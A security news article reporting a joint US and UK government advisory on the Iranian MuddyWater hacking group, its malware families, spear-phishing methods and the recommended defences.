Iran’s MuddyWater Hacker Group Using New Malware in Worldwide Cyber Attacks
Reading Time: 2 minutes

According to cybersecurity agencies from the U.K. and the U.S. Iran’s MuddyWater Hacker Group is using new malware in worldwide cyber-attacks.

A joint advisory released by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), and the U.K.’s National Cyber Security Centre (NCSC)  said, “MuddyWater actors are positioned both to provide stolen data and access to the Iranian government and to share these with other malicious cyber actors.” 

MuddyWater hacking group is known for conducting malicious operations as part of Iran’s Ministry of Intelligence and Security (MOIS) targeting a wide range of government and private-sector organizations, including telecommunications, defense, local government, and oil and natural gas sectors, in Asia, Africa, Europe, and North America.

The hacking group also operated under numerous names like Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros. It is known for carrying out cyber espionage to support MOIS objectives since roughly 2018.

MuddyWater hacking group is known to exploit publicly reported vulnerabilities and has a history of employing open-source tools to gain access to sensitive data, deploy ransomware, and achieve persistence on victim networks.

Cisco Talos last month uncovered a previously undocumented malware campaign aimed at Turkish private organizations and governmental institutions with the goal of deploying a PowerShell-based backdoor.

Security agencies have now recovered evidence of similar tactics where they make use of obfuscated PowerShell scripts to conceal the most damaging parts of the attacks, including command-and-control (C2) functions.

The cyberattacks are carried out via a spear-phishing campaign that attempts to coax its targets into downloading suspicious ZIP archives that either contain an Excel file with a malicious macro that communicates with the actor’s C2 server or a PDF file that drops a malicious payload to the infected system.

The law enforcement agencies said, “Additionally, the group uses multiple malware sets — including PowGoop, Small Sieve, Canopy/Starwhale, Mori, and POWERSTATS — for loading malware, backdoor access, persistence, and exfiltration.”

This means the PowGoop functions as a loader responsible for downloading second-stage PowerShell scripts. While Small Sieve, described as a Python-based implant, is used for maintaining a foothold in the network by leveraging the Telegram API for C2 communications to evade detection.

Additionally, a Windows Script File (.WSF) is used to collect and transmit system metadata to an adversary-controlled IP address, and two backdoors called Mori and POWERSTATS are used to run commands received from the C2 and maintain persistent access.

That’s not all, MuddyWater has also employed a survey script to enumerate information about victim computers. It is sent back to the remote C2 server and also deployed in a newly identified PowerShell backdoor that’s used to execute commands received from the attacker.

The law enforcement agencies in order to obstruct potential attacks have advised organizations to use multi-factor authentication wherever applicable. They have also recommended limiting the use of administrator privileges, implementing phishing protections, and prioritizing patching known exploited vulnerabilities

Related Articles:
TrickBot Gang Switches to New Malware
Organizations Need To Increase Website Security After Russian Attack
Hackers use Dridex Malware and Entropy Ransomware on Hacked Computers